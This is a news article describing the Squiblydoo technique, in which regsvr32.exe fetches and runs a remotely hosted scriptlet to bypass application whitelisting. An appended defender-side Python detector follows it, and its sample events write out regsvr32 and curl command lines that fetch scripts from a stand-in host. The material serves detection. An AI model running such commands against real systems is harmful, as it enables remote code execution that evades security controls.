Squiblydoo exploits Microsoft OS to remotely run script

Squiblydoo manages to evade detection because the script is hosted remotely and is run by a legitimate Microsoft binary.

Squiblydoo may sound like a crossover episode featuring Squidward and Scooby Doo, but researchers at Carbon Black say Squiblydoo is actually a brand new and very potent exploitation technique.

Carbon Black's report noted that Squiblydoo allows users with normal privileges to run a script hosted on a remote server using Microsoft's own binaries. Specifically, the technique uses the binary regsvr32.exe to download an XML file containing scriptlets, which allow the attacker to execute code on the victim's computer.

Squiblydoo manages to evade detection because the script is hosted remotely and is run by a legitimate Microsoft binary.

It is “designed to bypass application whitelisting software by utilizing tools that are built into the operating system by default. In other words, Squiblydoo provides a way for unapproved scripts to run on a machine that is set up to allow only approved scripts to run,” Carbon Black said.
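As an added defender-side example that is not part of this article or of Carbon Black's report: a small Python checker that flags process-creation events in which regsvr32.exe is launched with a remote URL as its /i: install argument, the behaviour the article describes, and ignores ordinary local DLL registrations. The sample events, hostnames and file names are constructed placeholders, not real telemetry.

```python
import re

# A remote http(s) URL anywhere in a command line.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# The value passed to regsvr32's /i: (install) switch.
INSTALL_ARG_RE = re.compile(r"(?:^|\s)/i:(\S+)", re.IGNORECASE)

# Constructed sample events in a Sysmon Event ID 1 (process creation) style.
# Hosts under example.invalid and placeholder.dll are not real indicators.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://example.invalid/script.xml placeholder.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "CommandLine": r"REGSVR32.EXE /s /I:https://example.invalid/x.sct placeholder.dll"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c curl http://example.invalid/"},
]


def _basename(path):
    """Lower-cased file name of a Windows path, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return the reasons this event looks like Squiblydoo-style regsvr32 abuse (empty if none)."""
    if _basename(event.get("Image", "")) != "regsvr32.exe":
        return []
    cmd = event.get("CommandLine", "")
    reasons = []
    m = INSTALL_ARG_RE.search(cmd)
    if m and URL_RE.match(m.group(1)):
        reasons.append("/i: install argument points at a remote URL")
    elif URL_RE.search(cmd):
        reasons.append("command line contains a remote URL")
    return reasons


def scan_events(events):
    """Return (index, reasons) for every event that matched."""
    hits = []
    for i, event in enumerate(events):
        reasons = analyze_event(event)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan_events(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['CommandLine']} -> {'; '.join(reasons)}")
```

In a real deployment the same check would run over the endpoint's process-creation telemetry, and a regsvr32 launch that fetches anything over HTTP is worth an alert on its own, since registering a local COM DLL never needs a network address.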
